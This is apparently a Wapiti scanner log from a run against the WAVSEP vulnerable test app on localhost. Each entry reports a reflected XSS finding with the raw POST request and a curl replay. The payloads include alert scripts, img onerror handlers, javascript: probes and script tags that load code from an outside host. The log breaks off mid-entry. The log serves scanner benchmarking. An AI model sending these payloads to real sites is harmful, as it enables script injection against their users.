Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wsdnpt8q3l%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wsdnpt8q3l%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w60llee98b%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w60llee98b%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w7jbxcqjf8%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w7jbxcqjf8%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4lfavwl4cz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4lfavwl4cz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwijs21781tz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwijs21781tz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wik0hg583x%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -d "userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wik0hg583x%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa16rtyoopz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa16rtyoopz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtak0jo64zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp" -d "userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtak0jo64zz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdf3xvqgzz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp" -d "userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdf3xvqgzz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwzre2h5cj1%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwzre2h5cj1%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wyr5r3vucv%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wyr5r3vucv%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2ilojiq2x%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2ilojiq2x%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wx01jnjo54%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp" -d "userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wx01jnjo54%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwa40x723bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp" -d "userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwa40x723bz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwl7uh28xru%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwl7uh28xru%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwd4anvbqc3%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwd4anvbqc3%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwua9d3wbtz%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwua9d3wbtz%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwxkjabhzwy%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwxkjabhzwy%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwb2tywjp4a%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwb2tywjp4a%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cw4z5fby6kf%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cw4z5fby6kf%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwfuxr25w8v%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwfuxr25w8v%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwnncx7qz57%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwnncx7qz57%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwx42vb43ab%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwx42vb43ab%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwdm507o346%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwdm507o346%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwvwscwsimb%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwvwscwsimb%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cw0qqqnhzjc%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cw0qqqnhzjc%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwyl1fx29nt%2C1%29
